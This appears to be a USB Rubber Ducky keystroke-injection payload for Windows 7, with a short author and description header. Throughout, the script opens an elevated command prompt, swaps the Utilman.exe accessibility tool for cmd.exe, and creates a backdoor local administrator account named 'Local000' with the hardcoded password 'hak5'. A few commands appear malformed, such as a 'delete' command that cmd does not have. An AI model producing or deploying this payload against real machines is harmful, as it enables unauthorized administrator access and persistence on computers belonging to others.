95 lines
1.6 KiB
Plaintext
95 lines
1.6 KiB
Plaintext
|
Author: Xcellerator (props to Jay Kruer's Fork Bomb script for the UAC bypass technique!)
|
||
|
Duckencoder: 1.0
|
||
|
Target: Windows 7
|
||
|
Description: Uses the Utilman.exe Exploit to create a new local administrator account “Local000” with the password “hak5”.
|
||
|
REM Author: Xcellerator
|
||
|
REM Description: Utilman Exploiter to create a new Admin Account
|
||
|
REM The new account will be called "Local000".
|
||
|
GUI
|
||
|
DELAY 50
|
||
|
STRING cmd
|
||
|
MENU
|
||
|
STRING a
|
||
|
ENTER
|
||
|
LEFT
|
||
|
ENTER
|
||
|
DELAY 200
|
||
|
STRING takeown /f "%systemroot%\System32\Utilman.exe"
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING cd %systemroot%\System32
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING mkdir util
|
||
|
ENTER
|
||
|
STRING xcopy cmd.exe util\
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING ren Utilman.exe Utilman.exe.bak
|
||
|
ENTER
|
||
|
STRING cd util
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING ren cmd.exe Utilman.exe
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING cd ..
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING xcopy util/Utilman.exe \
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING rmdir /s /q util
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING exit
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
GUI u
|
||
|
STRING net user Local000 /add
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING net localgroup administrators Local000 /add
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING exit
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
GUI r
|
||
|
STRING cmd
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING cd "%systemroot%\System32"
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING delete Utilman.exe
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING y
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING ren Utilman.exe.bak Utilman.exe
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
STRING exit
|
||
|
ENTER
|
||
|
GUI
|
||
|
STRING cmd
|
||
|
MENU
|
||
|
STRING a
|
||
|
ENTER
|
||
|
DELAY 50
|
||
|
LEFT
|
||
|
ENTER
|
||
|
DELAY 200
|
||
|
STRING net user Local000 *
|
||
|
ENTER
|
||
|
STRING hak5
|
||
|
ENTER
|
||
|
STRING hak5
|
||
|
ENTER
|
||
|
STRING exit
|
||
|
ENTER
|